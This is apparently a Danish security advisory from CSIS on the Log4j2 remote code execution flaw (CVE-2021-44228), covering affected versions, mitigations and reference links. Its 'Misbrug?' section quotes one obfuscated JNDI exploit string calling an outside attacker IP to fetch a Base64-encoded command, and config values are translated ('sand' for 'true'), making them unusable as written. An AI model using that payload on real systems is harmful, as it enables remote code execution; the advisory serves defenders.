CSIS

Kritisk sårbarhed i populær open source java software rammer stort antal producenter og leverandører

Torsdag d. 9. 12. 2021 blev sikkerhedsindustrien ramt af en svær sårbarhed som optræder i et java-baseret rammeværktøj kendt som Log4j2. Software indgår i en bred vifte af sammenhænge og påvirker et stort antal leverandører og producenter. I et mellemstort eller stort netværk er chancen for at man kører en sårbar installation, som kan kompromitteres, overvejende høj.

Sårbarheden, som er en format-streng sårbarhed og en RCE (Remote Code Execution), fik tildelt CVE-ID'et: CVE-2021-44228 og udmærket med en CVSS score på hele 10.0. Det er den højeste risikoscore der findes på CVSS skalaen

Sårbarheden i Log4j2 softwaren optræder i et utal af sammenhænge, og er eksempelvis en vigtig logging funktion i Apache webservere. At der er tale om en tredjeparts opensource leverandør gør ikke arbejdet med at danne sig et komplet overblik over sårbare og potentielle angrebsfalder mindre. Det har en massiv nedaggående spiral i forhold til mange forskellige produkter og løsninger.

Få timer efter at Log4j2 sårbarheden blev publiceret, blev den integreret som del af det arsenal, der aktivt misbruges af BOTnettet kendt som Mirai.

 

Hvad ved vi?

- Log4J er en open source, Java-baseret løsning, der typisk bruges i relation til Apache-webservere.

 

- Log4j2-biblioteket findes i mange Apache-rammetjenester, og fra den 9. december 2021 pågår der aktivt misbrug.

 

- Alle organisationer, som anvender Apache webserver software, bør med det samme afdække om det er sårbart og potentielt deaktivere funktionen indtil der foreligger en patch.

 

Hvad bør man gøre?

  1. Opgrader til Log4j v2.15.0

 

  1. Hvis du bruger Log4j v2.10, eller nyere og af forskellige årsager ikke kan opgradere, så gennemfør følgende tiltag:

 

log4j2.formatMsgNoLookups=sand

 

Derudover kan en miljøvariabel sættes for de samme berørte versioner ved hjælp af:

 

LOG4J_FORMAT_MSG_NO_LOOKUPS=sand

 

  1. Fjern "JndiLookup" klassen. Det kan ske med følgende kommando:

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

 

  1. Skab et overblik over eventuelle eksterne enheder, der har log4j installeret.

 

  1. Installer en webapplikationsfirewall (WAF) med regler, der automatisk opdateres, så din SOC er i stand til at koncentrere sig om færre advarsler.

 

Misbrug?

Sårbarheden optræder i Log4j versionerne 2.0-beta-9 og 2.14.1.

 

Denne sårbarhed er desværre yderst triviel at udnytte og den indgår allerede i arsenalet hos flere IoT Botnets. En payload kan se ud som følgende, hvor parameteret i requesten, indeholder den arbitrære kommando, er BASE64 kodet:

 

${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://45.155.205[.]233:12344/Basic/Command/Base64/

 

Et patch til Log4j2 softwaren er frigivet med version Log4j version 2.15.0 som kan findes her:

https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2

 

En liste, som opsamler IP adresser, der systematisk foretager scanninger, og som man kan overveje at blokere på perimeter, kan findes her (opdateres løbende):

https://gist.github.com/gnremy/c546c7911d5f876f263309d7161a7217

 

Billedet herunder viser den geografiske lokation for servere/IPs som forsøger at misbruge Log4j2 sårbarheden.

 

Yderligere oplysninger:

https://www.cisa.gov/news/2021/12/11/statement-cisa-director-easterly-log4j-vulnerability

https://logging.apache.org/log4j/2.x/security.html

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd

https://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html

https://www.vmware.com/security/advisories/VMSA-2021-0028.html

 

Newsletter

Sign up

Stay informed.
Get our Cyber Bytes!